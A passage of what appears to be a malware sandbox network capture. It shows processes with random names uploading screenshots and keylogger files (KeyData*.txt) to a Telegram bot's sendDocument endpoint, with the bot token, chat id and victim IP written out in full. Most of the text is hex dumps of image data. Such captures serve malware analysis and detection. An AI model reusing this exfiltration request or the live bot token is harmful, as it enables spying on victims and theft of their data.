1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d Data Ascii:
2024-12-03 13:28:54 UTC	232	OUT	Data Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:28:54 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:58 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:28:58 GMT Content-Type: application/json Content-Length: 552 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49913	149.154.167.220	443	7744	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:28:55 UTC	559	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 3932422 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:28:55 UTC	16355	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 73 5a 59 54 74 6a 58 41 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotsZYTtjXA.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
2024-12-03 13:28:55 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:55 UTC	16355	OUT	Data Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:28:55 UTC	16355	OUT	Data Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f Data Ascii:
2024-12-03 13:28:55 UTC	16355	OUT	Data Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:28:55 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:55 UTC	16355	OUT	Data Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:28:55 UTC	16355	OUT	Data Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d Data Ascii:
2024-12-03 13:28:55 UTC	232	OUT	Data Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:28:55 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:59 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:28:59 GMT Content-Type: application/json Content-Length: 552 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49925	149.154.167.220	443	7388	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:29:00 UTC	555	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 568 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:29:00 UTC	568	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 4b 6c 57 75 62 56 67 76 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 35 30 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 35 30 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 35 30 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDataKlWubVgv.txt"Content-Type: application/octet-stream[08:28:50]<<Program Manager>>[08:28:50]<<Program Manager>>[08:28:50]<<Program Mana
2024-12-03 13:29:01 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:29:00 GMT Content-Type: application/json Content-Length: 546 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-03 13:29:01 UTC	546	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 39 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 32 35 30 33 30 32 39 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 33 32 34 35 36 36 36 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 62 61 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4f 62 64 6f 6e 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 32 35 34 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 4b 65 79 44 Data Ascii: {"ok":true,"result":{"message_id":3904,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1733232540,"document":{"file_name":"KeyD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49927	149.154.167.220	443	7744	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:29:01 UTC	555	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 568 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:29:01 UTC	568	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 70 4d 7a 41 6e 41 75 76 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 35 31 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 35 31 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 35 31 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDatapMzAnAuv.txt"Content-Type: application/octet-stream[08:28:51]<<Program Manager>>[08:28:51]<<Program Manager>>[08:28:51]<<Program Mana
2024-12-03 13:29:01 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:29:01 GMT Content-Type: application/json Content-Length: 546 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-03 13:29:01 UTC	546	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 39 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 32 35 30 33 30 32 39 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 33 32 34 35 36 36 36 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 62 61 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4f 62 64 6f 6e 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 32 35 34 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 4b 65 79 44 Data Ascii: {"ok":true,"result":{"message_id":3905,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1733232541,"document":{"file_name":"KeyD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49935	149.154.167.220	443	7388	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:29:04 UTC	559	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 3932422 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:29:04 UTC	16355	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 46 68 58 43 76 4e 5a 64 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 